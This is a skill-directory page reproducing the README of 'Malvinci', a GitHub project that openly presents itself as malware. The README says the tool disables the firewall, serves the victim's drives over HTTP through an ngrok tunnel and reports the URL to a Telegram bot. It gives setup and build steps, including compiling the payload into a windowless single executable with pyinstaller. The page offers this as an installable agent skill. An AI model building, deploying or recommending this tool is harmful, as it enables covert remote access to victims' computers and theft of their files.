SkillAgentSearch skills...

Malvinci

This simple but powerful script will introduce a new type of malware that will turn off the firewall, start an HTTP server, forward its port through ngrok, and send the URL of the server through a Telegram bot.

Install / Use

/learn @mazithesage/Malvinci
About this skill

Quality Score

0/100

Supported Platforms

Universal

README

malvinci

This simple script will introduce a new type of malware that will turn off the firewall, start an HTTP server, forward its port through ngrok, and send the URL of the server through a Telegram bot.

You will need to create a new Telegram BOT. Follow the steps the steps here to create one⚡

How to setup

Before running this program edit the payload.py file

  • Replace "botttoken" with your Telegram Bot API key.

  • Replace "chatid" with your Telegram Bot's Chat ID.

How To Use

# Install dependencies 
$ python3 , pip
$ py -3 -m pip install -r requirements.txt
# in order to change the drive you accesing use this parameter change_drive?drive=$Drive

# Building the payload

$ Replace the bot token And Chatid Cred in the file
$ Now compile the payload code using pyinstaller 
$ pyinstaller --noconfirm --onefile --windowed   payload.py 

View on GitHub
GitHub Stars59
CategoryDevelopment
Updated9mo ago
Forks5

Languages

Python

Security Score

72/100

Audited on Jul 7, 2025

No findings